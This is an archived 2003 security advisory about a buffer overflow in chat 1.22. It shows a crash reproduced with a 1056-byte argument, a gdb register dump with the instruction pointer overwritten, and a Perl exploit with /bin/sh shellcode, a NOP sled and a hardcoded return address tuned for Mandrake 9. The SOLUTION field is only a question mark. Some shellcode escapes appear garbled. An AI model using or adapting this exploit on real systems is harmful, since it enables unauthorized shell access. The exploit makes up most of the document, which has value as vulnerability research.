6th Jan 2003 [SBWID-5911]
COMMAND
chat locale buffer overflow
SYSTEMS AFFECTED
chat 1.22
PROBLEM
securma massine [securma@caramail.com] says :
chat is prone to a buffer overflow with a buffer [1056]byte
root@tasanou sbin]#
./chat `perl -e 'print "A"x1056'`
Segmentation fault (core dumped)
[root@tasanou sbin]# gdb chat core.3261 --quiet
(no debugging symbols found)...
Core was generated by
`AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/i686/libc.so.6...(no debugging
symbols found)...done.
Loaded symbols for /lib/i686/libc.so.6
Reading symbols from /lib/ld-linux.so.2...done.
Loaded symbols for /lib/ld-linux.so.2
#0 0x41414141 in ?? ()
(gdb) info reg
eax 0x804de90 134536848
ecx 0x0 0
edx 0x186a1 100001
ebx 0x41414141 1094795585
esp 0xbffe6cc0 0xbffe6cc0
ebp 0x41414141 0x41414141
esi 0x41414141 1094795585
edi 0x41414141 1094795585
eip 0x41414141 0x41414141
eip is overwritet
exploit code:
=============
#!/usr/bin/perl
#greets marocit
$shellcode = "x31xc0x31xdbxb0x17xcdx80" .
"xebx1fx5ex89x76x08x31xc0x88x46x07x89x46x0cxb0x0b" .
"x89xf3x8dx4ex08x8dx56x0cxcdx80x31xdbx89xd8x40xcd" .
"x80xe8xdcxffxffxff/bin/sh";
$ret =0xbfffe8e0;
$buf = 1056;
$egg = 6000;
$nop = "x90";
$offset = 0;
if (@ARGV == 1) { $offset = $ARGV[0]; }
$addr = pack('l', ($ret + $offset));
for ($i = 0; $i < $buf; $i += 4) {
$buffer .= $addr;
}
for ($i = 0; $i < ($egg - length($shellcode) - 100); $i++)
{
$buffer .= $nop;
}
$buffer .= $shellcode;
exec("./chat", $buffer,0);
#i use offset 1640 (mandrake 9)
SOLUTION
?
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH
